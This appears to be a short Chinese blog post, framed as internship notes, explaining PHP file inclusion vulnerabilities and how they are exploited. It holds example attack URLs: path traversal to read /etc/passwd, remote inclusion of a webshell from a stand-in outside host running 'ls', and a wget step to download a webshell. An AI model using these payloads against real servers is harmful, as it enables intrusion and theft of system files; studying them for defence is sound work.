PWC实习心得

2018-03-27-文件包含漏洞

2018-03-27  本文已影响29人  最初的美好_kai

1.原理

服务器通过php特性(函数)去包含任意文件时候,由于未对文件来源进行过滤,从而造成包含一个攻击者恶意构造的文件,造成威胁。

php中有四个函数可用于文件包含,分别是include(),require()和include_once(),require_once()。

include()函数可包含文件,当包含外部文件发生错误时,系统会给出警告,但文件会继续执行。

require()函数可包含文件,当包含外部文件发生错误时,系统会给出警告,但文件会停止执行。

Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

Require_once:这个函数跟require的区别 跟上面我所讲的include和include_once是一样的。所以我就不重复了。

2.为什么要包含文件

因为程序员不想重复写同样的代码,也不想代码复制多遍,通过包含的方法就可以直接使用里面的代码不需要再进行其他操作,所以大量地解放生产力。

3.如何利用

A:包含读出其他的文件

利用应用程序对文件包含处的参数过滤不严的漏洞,读取其他文件,例如指定URL为:http://hi.baidu.com/m4r10/php/index.php?page=./txt,这样可以直接读出该路径下面所有的txt文件,你可以用这种方法探查某文件存在与否,如果该地方参数未对../进行过滤的话,那你可以利用../来跳出当前路径,如果他的权限比较高的话,那你甚至可以进行输入绝对路径试一下,例如http://hi.baidu.com/m4r10/php/index.php?page=/etc/passwd。

B:远程文件包含可运行的PHP木马

如果目标主机的"allow_url_fopen"是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它URL上的一个包含PHP代码的webshell来直接运行,例如http://hi.baidu.com/m4r10/php/index.php?page= http://www.xxx.cn/cmd.txt?cmd=ls,cmd.txt为小马,可执行cmd命令,cmd=为接受命令参数。

C:包含一个创建文件的PHP文件

这种方法可有两种手段

1.通过wget方法来下载一个webshell

例如http://hi.baidu.com/m4r10/php/index.php?page= http://www.xxx.cn/cmd.txt?cmd=wget .........

2.直接创建一个新文件

如果主机禁用了wget这个命令或者当前目录禁止写操作,那就使用一个可以创建文件的脚本,找一个可以创建文件的目录进行创建。

上一篇下一篇

猜你喜欢

热点阅读